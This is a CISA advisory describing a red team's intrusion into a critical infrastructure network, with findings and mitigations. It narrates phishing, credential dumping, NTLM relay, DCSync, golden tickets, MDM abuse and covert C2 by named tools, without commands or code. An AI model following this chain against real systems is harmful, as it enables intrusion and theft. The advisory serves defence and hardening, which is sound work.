In 2022, CISA conducted a red team assessment (RTA) at the request of a large critical infrastructure organization with multiple geographically separated sites. The team gained persistent access to the organization’s network, moved laterally across the organization’s multiple geographically separated sites, and eventually gained access to systems adjacent to the organization’s sensitive business systems (SBSs). Multifactor authentication (MFA) prompts prevented the team from achieving access to one SBS, and the team was unable to complete its viable plan to compromise a second SBSs within the assessment period.

Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response.

CISA is releasing this CSA detailing the red team’s tactics, techniques, and procedures (TTPs) and key findings to provide network defenders of critical infrastructure organizations proactive steps to reduce the threat of similar activity from malicious cyber actors. This CSA highlights the importance of collecting and monitoring logs for unusual activity as well as continuous testing and exercises to ensure your organization’s environment is not vulnerable to compromise, regardless of the maturity of its cyber posture.

CISA encourages critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA—including conduct regular testing within their security operations center—to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.

Download the PDF version of this report:

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks(PDF, 1.06 MB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the appendix for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques.

Introduction

CISA has authority to, upon request, provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to Federal and non-Federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6].) After receiving a request for a red team assessment (RTA) from an organization and coordinating some high-level details of the engagement with certain personnel at the organization, CISA conducted the RTA over a three-month period in 2022.

During RTAs, a CISA red team emulates cyber threat actors to assess an organization’s cyber detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network while avoiding detection and evading defenses. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, or technology.

The “victim” for this assessment was a large organization with multiple geographically separated sites throughout the United States. For this assessment, the red team’s goal during Phase I was to gain access to certain sensitive business systems (SBSs).

Phase I: Red Team Cyber Threat Activity
Overview

The organization’s network was segmented with both logical and geographical boundaries. CISA’s red team gained initial access to two organization workstations at separate sites via spearphishing emails. After gaining access and leveraging Active Directory (AD) data, the team gained persistent access to a third host via spearphishing emails. From that host, the team moved laterally to a misconfigured server, from which they compromised the domain controller (DC). They then used forged credentials to move to multiple hosts across different sites in the environment and eventually gained root access to all workstations connected to the organization’s mobile device management (MDM) server. The team used this root access to move laterally to SBS-connected workstations. However, a multifactor authentication (MFA) prompt prevented the team from achieving access to one SBS, and Phase I ended before the team could implement a seemingly viable plan to achieve access to a second SBS.

Initial Access and Active Directory Discovery

The CISA red team gained initial access [TA0001] to two workstations at geographically separated sites (Site 1 and Site 2) via spearphishing emails. The team first conducted open-source research [TA0043] to identify potential targets for spearphishing. Specifically, the team looked for email addresses [T1589.002] as well as names [T1589.003] that could be used to derive email addresses based on the team’s identification of the email naming scheme. The red team sent tailored spearphishing emails to seven targets using commercially available email platforms [T1585.002]. The team used the logging and tracking features of one of the platforms to analyze the organization’s email filtering defenses and confirm the emails had reached the target’s inbox.

The team built a rapport with some targeted individuals through emails, eventually leading these individuals to accept a virtual meeting invite. The meeting invite took them to a red team-controlled domain [T1566.002] with a button, which, when clicked, downloaded a “malicious” ISO file [T1204]. After the download, another button appeared, which, when clicked, executed the file.

Two of the seven targets responded to the phishing attempt, giving the red team access to a workstation at Site 1 (Workstation 1) and a workstation at Site 2. On Workstation 1, the team leveraged a modified SharpHound collector, ldapsearch, and command-line tool, dsquery, to query and scrape AD information, including AD users [T1087.002], computers [T1018], groups [T1069.002], access control lists (ACLs), organizational units (OU), and group policy objects (GPOs) [T1615]. Note: SharpHound is a BloodHound collector, an open-source AD reconnaissance tool. Bloodhound has multiple collectors that assist with information querying.

There were 52 hosts in the AD that had Unconstrained Delegation enabled and a lastlogon timestamp within 30 days of the query. Hosts with Unconstrained Delegation enabled store Kerberos ticket-granting tickets (TGTs) of all users that have authenticated to that host. Many of these hosts, including a Site 1 SharePoint server, were Windows Server 2012R2. The default configuration of Windows Server 2012R2 allows unprivileged users to query group membership of local administrator groups.

The red team queried parsed Bloodhound data for members of the SharePoint admin group and identified several standard user accounts with administrative access. The team initiated a second spearphishing campaign, similar to the first, to target these users. One user triggered the red team’s payload, which led to installation of a persistent beacon on the user’s workstation (Workstation 2), giving the team persistent access to Workstation 2.

Lateral Movement, Credential Access, and Persistence

The red team moved laterally [TA0008] from Workstation 2 to the Site 1 SharePoint server and had SYSTEM level access to the Site 1 SharePoint server, which had Unconstrained Delegation enabled. They used this access to obtain the cached credentials of all logged-in users—including the New Technology Local Area Network Manager (NTLM) hash for the SharePoint server account. To obtain the credentials, the team took a snapshot of lsass.exe [T1003.001] with a tool called nanodump, exported the output, and processed the output offline with Mimikatz.

The team then exploited the Unconstrained Delegation misconfiguration to steal the DC’s TGT. They ran the DFSCoerce python script (DFSCoerce.py), which prompted DC authentication to the SharePoint server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT [T1550.002], [T1557.001]. (DFSCoerce abuses Microsoft’s Distributed File System [MS-DFSNM] protocol to relay authentication against an arbitrary server.[1])

The team then used the TGT to harvest advanced encryption standard (AES)-256 hashes via DCSync [T1003.006] for the krbtgt account and several privileged accounts—including domain admins, workstation admins, and a system center configuration management (SCCM) service account (SCCM Account 1). The team used the krbtgt account hash throughout the rest of their assessment to perform golden ticket attacks [T1558.001] in which they forged legitimate TGTs. The team also used the asktgt command to impersonate accounts they had credentials for by requesting account TGTs [T1550.003].

The team first impersonated the SCCM Account 1 and moved laterally to a Site 1 SCCM distribution point (DP) server (SCCM Server 1) that had direct network access to Workstation 2. The team then moved from SCCM Server 1 to a central SCCM server (SCCM Server 2) at a third site (Site 3). Specifically, the team:

  1. Queried the AD using Lightweight Directory Access Protocol (LDAP) for information about the network’s sites and subnets [T1016]. This query revealed all organization sites and subnets broken down by classless inter-domain routing (CIDR) subnet and description.
  2. Used LDAP queries and domain name system (DNS) requests to identify recently active hosts.
  3. Listed existing network connections [T1049] on SCCM Server 1, which revealed an active Server Message Block (SMB) connection from SCCM Server 2.
  4. Attempted to move laterally to the SCCM Server 2 via AppDomain hijacking, but the HTTPS beacon failed to call back.
  5. Attempted to move laterally with an SMB beacon [T1021.002], which was successful.

The team also moved from SCCM Server 1 to a Site 1 workstation (Workstation 3) that housed an active server administrator. The team impersonated an administrative service account via a golden ticket attack (from SCCM Server 1); the account had administrative privileges on Workstation 3. The user employed a KeePass password manager that the team was able to use to obtain passwords for other internal websites, a kernel-based virtual machine (KVM) server, virtual private network (VPN) endpoints, firewalls, and another KeePass database with credentials. The server administrator relied on a password manager, which stored credentials in a database file. The red team pulled the decryption key from memory using KeeThief and used it to unlock the database [T1555.005].

At the organization’s request, the red team confirmed that SCCM Server 2 provided access to the organization’s sites because firewall rules allowed SMB traffic to SCCM servers at all other sites.

The team moved laterally from SCCM Server 2 to an SCCM DP server at Site 5 and from the SCCM Server 1 to hosts at two other sites (Sites 4 and 6). The team installed persistent beacons at each of these sites. Site 5 was broken into a private and a public subnet and only DCs were able to cross that boundary. To move between the subnets, the team moved through DCs. Specifically, the team moved from the Site 5 SCCM DP server to a public DC; and then they moved from the public DC to the private DC. The team was then able to move from the private DC to workstations in the private subnet.

The team leveraged access available from SCCM 2 to move around the organization’s network for post-exploitation activities (See Post-Exploitation Activity section).

See Figure 1 for a timeline of the red team’s initial access and lateral movement showing key access points.

Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement
Figure 1: Red Team Cyber Threat Activity: Initial Access and Lateral Movement

While traversing the network, the team varied their lateral movement techniques to evade detection and because the organization had non-uniform firewalls between the sites and within the sites (within the sites, firewalls were configured by subnet). The team’s primary methods to move between sites were AppDomainManager hijacking and dynamic-link library (DLL) hijacking [T1574.001]. In some instances, they used Windows Management Instrumentation (WMI) Event Subscriptions [T1546.003].

The team impersonated several accounts to evade detection while moving. When possible, the team remotely enumerated the local administrators group on target hosts to find a valid user account. This technique relies on anonymous SMB pipe binds [T1071], which are disabled by default starting with Windows Server 2016. In other cases, the team attempted to determine valid accounts based on group name and purpose. If the team had previously acquired the credentials, they used asktgt to impersonate the account. If the team did not have the credentials, they used the golden ticket attack to forge the account.

Post-Exploitation Activity: Gaining Access to SBSs

With persistent, deep access established across the organization’s networks and subnetworks, the red team began post-exploitation activities and attempted to access SBSs. Trusted agents of the organization tasked the team with gaining access to two specialized servers (SBS 1 and SBS 2). The team achieved root access to three SBS-adjacent workstations but was unable to move laterally to the SBS servers:

  • Phase I ended before the team could implement a plan to move to SBS 1.
  • An MFA prompt blocked the team from moving to SBS 2, and Phase I ended before they could implement potential workarounds.

However, the team assesses that by using Secure Shell (SSH) session socket files (see below), they could have accessed any hosts available to the users whose workstations were compromised.

Plan for Potential Access to SBS 1

Conducting open-source research [1591.001], the team identified that SBS 1 and 2 assets and associated management/upkeep staff were located at Sites 5 and 6, respectively. Adding previously collected AD data to this discovery, the team was able to identify a specific SBS 1 admin account. The team planned to use the organization’s mobile device management (MDM) software to move laterally to the SBS 1 administrator’s workstation and, from there, pivot to SBS 1 assets.

The team identified the organization’s MDM vendor using open-source and AD information [T1590.006] and moved laterally to an MDM distribution point server at Site 5 (MDM DP 1). This server contained backups of the MDM MySQL database on its D: drive in the Backup directory. The backups included the encryption key needed to decrypt any encrypted values, such as SSH passwords [T1552]. The database backup identified both the user of the SBS 1 administrator account (USER 2) and the user’s workstation (Workstation 4), which the MDM software remotely administered.

The team moved laterally to an MDM server (MDM 1) at Site 3, searched files on the server, and found plaintext credentials [T1552.001] to an application programming interface (API) user account stored in PowerShell scripts. The team attempted to leverage these credentials to browse to the web login page of the MDM vendor but were unable to do so because the website directed to an organization-controlled single-sign on (SSO) authentication page.

The team gained root access to workstations connected to MDM 1—specifically, the team accessed Workstation 4—by:

  1. Selecting an MDM user from the plaintext credentials in PowerShell scripts on MDM 1.
  2. While in the MDM MySQL database,
    • Elevating the selected MDM user’s account privileges to administrator privileges, and
    • Modifying the user’s account by adding Create Policy and Delete Policy permissions [T1098], [T1548].
  3. Creating a policy via the MDM API [T1106], which instructed Workstation 4 to download and execute a payload to give the team interactive access as root to the workstation.
  4. Verifying their interactive access.
  5. Resetting permissions back to their original state by removing the policy via the MDM API and removing Create Policy and Delete Policy and administrator permissions and from the MDM user’s account.

While interacting with Workstation 4, the team found an open SSH socket file and a corresponding netstat connection to a host that the team identified as a bastion host from architecture documentation found on Workstation 4. The team planned to move from Workstation 4 to the bastion host to SBS 1. Note: A SSH socket file allows a user to open multiple SSH sessions through a single, already authenticated SSH connection without additional authentication.

The team could not take advantage of the open SSH socket. Instead, they searched through SBS 1 architecture diagrams and documentation on Workstation 4. They found a security operations (SecOps) network diagram detailing the network boundaries between Site 5 SecOps on-premises systems, Site 5 non-SecOps on-premises systems, and Site 5 SecOps cloud infrastructure. The documentation listed the SecOps cloud infrastructure IP ranges [T1580]. These “trusted” IP addresses were a public /16 subnet; the team was able to request a public IP in that range from the same cloud provider, and Workstation 4 made successful outbound SSH connections to this cloud infrastructure. The team intended to use that connection to reverse tunnel traffic back to the workstation and then access the bastion host via the open SSH socket file. However, Phase 1 ended before they were able to implement this plan.

Attempts to Access SBS 2

Conducting open-source research, the team identified an organizational branch [T1591] that likely had access to SBS 2. The team queried the AD to identify the branch’s users and administrators. The team gathered a list of potential accounts, from which they identified administrators, such as SYSTEMS ADMIN or DATA SYSTEMS ADMINISTRATOR, with technical roles. Using their access to the MDM MySQL database, the team queried potential targets to (1) determine the target’s last contact time with the MDM and (2) ensure any policy targeting the target’s workstation would run relatively quickly [T1596.005]. Using the same methodology as described by the steps in the Plan for Potential Access to SBS 1 section above, the team gained interactive root access to two Site 6 SBS 2-connected workstations: a software engineering workstation (Workstation 5) and a user administrator workstation (Workstation 6).

The Workstation 5 user had bash history files with what appeared to be SSH passwords mistyped into the bash prompt and saved in bash history [T1552.003]. The team then attempted to authenticate to SBS 2 using a similar tunnel setup as described in the Access to SBS 1 section above and the potential credentials from the user’s bash history file. However, this attempt was unsuccessful for unknown reasons.

On Workstation 6, the team found a .txt file containing plaintext credentials for the user. Using the pattern discovered in these credentials, the team was able to crack the user’s workstation account password [T1110.002]. The team also discovered potential passwords and SSH connection commands in the user’s bash history. Using a similar tunnel setup described above, the team attempted to log into SBS 2. However, a prompt for an MFA passcode blocked this attempt.

See figure 2 for a timeline of the team’s post exploitation activity that includes key points of access.

Figure 2: Red Team Cyber Threat Activity: Post Exploitation
Figure 2: Red Team Cyber Threat Activity: Post Exploitation
Command and Control

The team used third-party owned and operated infrastructure and services [T1583] throughout their assessment, including in certain cases for command and control (C2) [TA0011]. These included:

  • Cobalt Strike and Merlin payloads for C2 throughout the assessment. Note: Merlin is a post-exploit tool that leverages HTTP protocols for C2 traffic.
    • The team maintained multiple Cobalt Strike servers hosted by a cloud vendor. They configured each server with a different domain and used the servers for communication with compromised hosts. These servers retained all assessment data.
  • Two commercially available cloud-computing platforms.
    • The team used these platforms to create flexible and dynamic redirect servers to send traffic to the team’s Cobalt Strike servers [T1090.002]. Redirecting servers make it difficult for defenders to attribute assessment activities to the backend team servers. The redirectors used HTTPS reverse proxies to redirect C2 traffic between the target organization’s network and the Cobalt Strike team servers [T1071.002]. The team encrypted all data in transit [T1573] using encryption keys stored on team’s Cobalt Strike servers.
  • A cloud service to rapidly change the IP address of the team’s redirecting servers in the event of detection and eradication.
  • Content delivery network (CDN) services to further obfuscate some of the team’s C2 traffic.
    • This technique leverages CDNs associated with high-reputation domains so that the malicious traffic appears to be directed towards a reputation domain but is actually redirected to the red team-controlled Cobalt Strike servers.
    • The team used domain fronting [T1090.004] to disguise outbound traffic in order to diversify the domains with which the persistent beacons were communicating. This technique, which also leverages CDNs, allows the beacon to appear to connect to third-party domains, such as nytimes.com, when it is actually connecting to the team’s redirect server.
Phase II: Red Team Measurable Events Activity

The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. See Table 1 for a description of the events, the expected network defender activity, and the organization’s actual response.

Measurable EventDescriptionMITRE ATT&CK Technique(s)Expected Detection PointsExpected Network Defender ReactionsReported Reactions
Internal Port ScanLaunch scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s).Network Service Discovery [T1046]Network Monitoring and Analysis ToolsIntrusion Detection or Prevention SystemsEndpoint Protection PlatformDetect target hosts and portsIdentify associated scanning processAnalyze scanning host once detectedDevelop response planNone
 Comprehensive Active Directory and Host EnumerationPerform AD enumeration by querying all domain objects from the DC; and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server).Domain Trust Discovery [T1482]Account Discovery: Domain Account [T1087.002]System Owner/User Discovery [T1033]Remote System Discovery [T1018]Network Monitoring and Analysis ToolsIntrusion Detection or Prevention SystemsEndpoint Protection PlatformDetect target hosts and portsIdentify associated scanning processAnalyze scanning host once detectedDevelop response planCollection process stopped before completion. Host isolated and sent for forensics.
Data Exfiltration—1 GB of DataSend a large amount (1 GB) of mock sensitive information to an external system over various protocols, including ICMP, DNS, FTP, and/or HTTP/S.Exfiltration Over Alternative Protocol [T1048]Network Monitoring and Analysis ToolsIntrusion Detection or Prevention SystemsEndpoint Protection PlatformDetect target hosts and portsIdentify associated scanning processAnalyze scanning host once detectedDevelop response planNone
Malicious Traffic Generation—Workstation to External HostEstablish a session that originates from a target Workstation system directly to an external host over a clear text protocol, such as HTTP.Application Layer Protocol [T1071]Intrusion Detection or Prevention SystemsEndpoint Protection PlatformWindows Event LogsDetect and Identify source IP and source process of enumerationAnalyze scanning host once detectedDevelop response planNone
Active Directory Account LockoutLock out several administrative AD accountsAccount Access Removal [T1531Windows Event LogsEnd User ReportingDetect and Identify source IP and source process of exfiltrationAnalyze host used for exfiltration once detectedDevelop response planNone
Local Admin User Account Creation (workstation)Create a local administrator account on a target workstation system.Create Account: Local Account [T1136.001]Account Manipulation [T1098]Intrusion Detection or Prevention SystemsEndpoint Protection PlatformWeb Proxy LogsDetect and identify source IP and source process of malicious trafficInvestigate destination IP addressTriage compromised hostDevelop response planNone
Local Admin User Account Creation (server)Create a local administrator account on a target server system.Create Account: Local Account [T1136.001]Account Manipulation [T1098]Windows Event LogsDetect account creationIdentify source of changeVerify change with system ownerDevelop response planNone
Active Directory Account CreationCreate AD accounts and add it to domain admins groupCreate Account: Domain Account [T1136.002]Account Manipulation [T1098]Windows Event LogsDetect account creationIdentify source of changeVerify change with system ownerDevelop response planNone
Workstation Admin Lateral Movement—Workstation to WorkstationUse a previously compromised workstation admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on several target Workstations. Valid Accounts: Domain Accounts [T1078.002]Remote Services: SMB/Windows Admin Shares, Sub-technique [T1021.002]Create or Modify System Process: Windows Service [T1543.003]Windows Event LogsDetect account compromiseAnalyze compromised hostDevelop response planNone
Domain Admin Lateral Movement—Workstation to Domain ControllerUse a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC.Valid Accounts: Domain Accounts [T1078.002]Remote Services: SMB/Windows Admin Shares, Sub-technique [T1021.002]Create or Modify System Process: Windows Service [T1543.003]Windows Event LogsDetect account compromiseTriage compromised hostDevelop response planNone
Malicious Traffic Generation—Domain Controller to External HostEstablish a session that originates from a target Domain Controller system directly to an external host over a clear text protocol, such as HTTP.Application Layer Protocol [T1071]Intrusion Detection or Prevention SystemsEndpoint Protection PlatformWeb Proxy LogsDetect and identify source IP and source process of malicious trafficInvestigate destination IP addressTriage compromised hostDevelop response planNone
Trigger Host-Based Protection—Domain ControllerUpload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.Ingress Tool Transfer [T1105]Endpoint Protection PlatformEndpoint Detection and ResponseDetect and identify source IP and source process of malicious trafficInvestigate destination IP addressTriage compromised hostDevelop response planMalicious file was removed by antivirus
Ransomware SimulationExecute simulated ransomware on multiple Workstation systems to simulate a ransomware attack.Note: This technique does NOT encrypt files on the target system.N/AEnd User ReportingInvestigate end user reported eventTriage compromised hostDevelop response PlanFour users reported event to defensive staff
Findings
Key Issues

The red team noted the following key issues relevant to the security of the organization’s network. These findings contributed to the team’s ability to gain persistent, undetected access across the organization’s sites. See the Mitigations section for recommendations on how to mitigate these issues.

  • Insufficient host and network monitoring. Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network. The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. Additionally, throughout Phase I, the team received no deconflictions or confirmation that the organization caught their activity. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection:
    • Phishing
    • Lateral movement reuse
    • Generation and use of the golden ticket
    • Anomalous LDAP traffic
    • Anomalous internal share enumeration
    • Unconstrained Delegation server compromise
    • DCSync
    • Anomalous account usage during lateral movement
    • Anomalous outbound network traffic
    • Anomalous outbound SSH connections to the team’s cloud servers from workstations
  • Lack of monitoring on endpoint management systems. The team used the organization’s MDM system to gain root access to machines across the organization’s network without being detected. Endpoint management systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
  • KRBTGT never changed. The Site 1 krbtgt account password had not been updated for over a decade. The krbtgt account is a domain default account that acts as a service account for the key distribution center (KDC) service used to encrypt and sign all Kerberos tickets for the domain. Compromise of the krbtgt account could provide adversaries with the ability to sign their own TGTs, facilitating domain access years after the date of compromise. The red team was able to use the krbtgt account to forge TGTs for multiple accounts throughout Phase I.
  • Excessive permissions to standard users. The team discovered several standard user accounts that have local administrator access to critical servers. This misconfiguration allowed the team to use the low-level access of a phished user to move laterally to an Unconstrained Delegation host and compromise the entire domain.
  • Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of all users that authenticate to that host, enabling actors to steal service tickets or compromise krbtgt accounts and perform golden ticket or “silver ticket” attacks. The team performed an NTLM-relay attack to obtain the DC’s TGT, followed by a golden ticket attack on a SharePoint server with Unconstrained Delegation to gain the ability to impersonate any Site 1 AD account.
  • Use of non-secure default configurations. The organization used default configurations for hosts with Windows Server 2012 R2. The default configuration allows unprivileged users to query group membership of local administrator groups. The red team used and identified several standard user accounts with administrative access from a Windows Server 2012 R2 SharePoint server.
Additional Issues

The team noted the following additional issues.

  • Ineffective separation of privileged accounts. Some workstations allowed unprivileged accounts to have local administrator access; for example, the red team discovered an ordinary user account in the local admin group for the SharePoint server. If a user with administrative access is compromised, an actor can access servers without needing to elevate privileges. Administrative and user accounts should be separated, and designated admin accounts should be exclusively used for admin purposes.
  • Lack of server egress control. Most servers, including domain controllers, allowed unrestricted egress traffic to the internet.
  • Inconsistent host configuration. The team observed inconsistencies on servers and workstations within the domain, including inconsistent membership in the local administrator group among different servers or workstations. For example, some workstations had “Server Admins” or “Domain Admins” as local administrators, and other workstations had neither.
  • Potentially unwanted programs. The team noticed potentially unusual software, including music software, installed on both workstations and servers. These extraneous software installations indicate inconsistent host configuration (see above) and increase the attack surfaces for malicious actors to gain initial access or escalate privileges once in the network.
  • Mandatory password changes enabled. During the assessment, the team keylogged a user during a mandatory password change and noticed that only the final character of their password was modified. This is potentially due to domain passwords being required to be changed every 60 days.
  • Smart card use was inconsistent across the domain. While the technology was deployed, it was not applied uniformly, and there was a significant portion of users without smartcard protections enabled. The team used these unprotected accounts throughout their assessment to move laterally through the domain and gain persistence.
Noted Strengths

The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions:

  • The organization conducts regular, proactive penetration tests and adversarial assessments and invests in hardening their network based on findings.
    • The team was unable to discover any easily exploitable services, ports, or web interfaces from more than three million external in-scope IPs. This forced the team to resort to phishing to gain initial access to the environment.
    • Service account passwords were strong. The team was unable to crack any of the hashes obtained from the 610 service accounts pulled. This is a critical strength because it slowed the team from moving around the network in the initial parts of the Phase I.
    • The team did not discover any useful credentials on open file shares or file servers. This slowed the progress of the team from moving around the network.
  • MFA was used for some SBSs. The team was blocked from moving to SBS 2 by an MFA prompt.
  • There were strong security controls and segmentation for SBS systems. Direct access to SBS were located in separate networks, and admins of SBS used workstations protected by local firewalls.

MITIGATIONS

CISA recommends organizations implement the recommendations in Table 2 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

IssueRecommendation
Insufficient host and network monitoringEstablish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior [CPG 3.1]. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques.Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report.From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts.Consider who is accessing what (what resource), from where (what internal host or external location), and when (what day and time the access occurs).Look for access behavior that deviates from expected or is indicative of AD abuse.Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PSExec, and WMI, which are often used by malicious actors. CISA recommends selecting one tool to administer the network, ensuring logging is turned on [CPG 3.1], and disabling the others.Consider using “honeypot” service principal names (SPNs) to detect attempts to crack account hashes [CPG 1.1].Conduct regular assessments to ensure processes and procedures are up to date and can be followed by security staff and end users.Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with Unconstrained Delegation enabled).Ensure all commercial tools deployed in your environment are regularly tuned to pick up on relevant activity in your environment.
Lack of monitoring on endpoint management systemsTreat endpoint management systems as HVAs with additional restrictions and monitoring because they provide elevated access to thousands of hosts.
KRBTGT never changedChange the krbtgt account password on a regular schedule such as every 6 to 12 months or if it becomes compromised. Note that this password change must be carefully performed to effectively change the credential without breaking AD functionality. The password must be changed twice to effectively invalidate the old credentials. However, the required waiting period between resets must be greater than the maximum lifetime period of Kerberos tickets, which is 10 hours by default. See Microsoft’s KRBTGT account maintenance considerations guidance for more information.
Excessive permissions to standard users and ineffective separation of privileged accountsImplement the principle of least privilege:Grant standard user rights for standard user tasks such as email, web browsing, and using line-of-business (LOB) applications.Periodically audit standard accounts and minimize where they have privileged access.Periodically Audit AD permissions to ensure users do not have excessive permissions and have not been added to admin groups.Evaluate which administrative groups should administer which servers/workstations. Ensure group members administrative accounts instead of standard accounts.Separate administrator accounts from user accounts [CPG 1.5]. Only allow designated admin accounts to be used for admin purposes. If an individual user needs administrative rights over their workstation, use a separate account that does not have administrative access to other hosts, such as servers.Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 3.4]. PAM solutions can also log and alert usage to detect any unusual activity and may have helped stop the red team from accessing resources with admin accounts. Note: password vaults associated with PAM solutions should be treated as HVAs with additional restrictions and monitoring (see below).Configure time-based access for accounts set at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege, as well as the Zero Trust model. This is a process in which a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When individual users need the account, they submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.
Hosts with Unconstrained Delegation enabledRemove Unconstrained Delegation from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., constrained delegation) or explore whether systems can be retired or further isolated from the enterprise. CISA recommends Windows Server 2019 or greater.Consider disabling or limiting NTLM and WDigest Authentication if possible, including using their use as criteria for prioritizing updates to legacy systems or for segmenting the network. Instead use more modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 bit encryption [CPG 3.4].If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks CPG 3.4]. See Microsoft Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Microsoft Overview of Server Message Block signing for more information.
Use of non-secure default configurationsKeep systems and software up to date [CPG 5.1]. If updates cannot be uniformly installed, update insecure configurations to meet updated standards.
Lack of server egress controlConfigure internal firewalls and proxies to restrict internet traffic from hosts that do not require it. If a host requires specific outbound traffic, consider creating an allowlist policy of domains.
Large number of credentials in a shared vaultTreat password vaults as HVAs with additional restrictions and monitoring [CPG 3.4]:If on-premise, require MFA for admin and apply network segmentation [CPG 1.3]. Use solutions with end-to-end encryption where applicable [CPG 3.3].If cloud-based, evaluate the provider to ensure use of strong security controls such as MFA and end-to-end encryption [CPG 1.3, 3.3].
Inconsistent host configurationEstablish a baseline/gold-image for workstations and servers and deploy from that image [CPG 2.5]. Use standardized groups to administer hosts in the network.
Potentially unwanted programsImplement software allowlisting to ensure users can only install software from an approved list [CPG 2.1].Remove unnecessary, extraneous software from servers and workstations.
Mandatory password changes enabledConsider only requiring changes for memorized passwords in the event of compromise. Regular changing of memorized passwords can lead to predictable patterns, and both CISA and the National Institute of Standards and Technology (NIST) recommend against changing passwords on regular intervals.

Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture:

  • Provide users with regular training and exercises, specifically related to phishing emails [CPG 4.3]. Phishing accounts for majority of initial access intrusion events.
  • Enforce phishing-resistant MFA to the greatest extent possible [CPG 1.3].
  • Reduce the risk of credential compromise via the following:
    • Place domain admin accounts in the protected users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM.
    • Implement Credential Guard for Windows 10 and Server 2016 (Refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).
    • Refrain from storing plaintext credentials in scripts [CPG 3.4]. The red team discovered a PowerShell script containing plaintext credentials that allowed them to escalate to admin.
  • Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.

As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that:

  • Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).
  • Upgrades applications and infrastructure to leverage modern identity management and network access practices.
  • Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks.
  • Invests in technology and personnel to achieve these goals.

CISA encourages organizational IT leadership to ask their executive leadership the question: Can the organization accept the business risk of NOT implementing critical security controls such as MFA? Risks of that nature should typically be acknowledged and prioritized at the most senior levels of an organization.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

See CISA’s RedEye tool on CISA’s GitHub page. RedEye is an interactive open-source analytic tool used to visualize and report red team command and control activities. See CISA’s RedEye tool overview video for more information.

REFERENCES
[1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 3 for all referenced red team tactics and techniques in this advisory. Note: activity was from Phase I unless noted.

 Reconnaissance 
Technique TitleIDUse
Gather Victim Identity Information: Email AddressesT1589.002 The team found employee email addresses via open-source research.
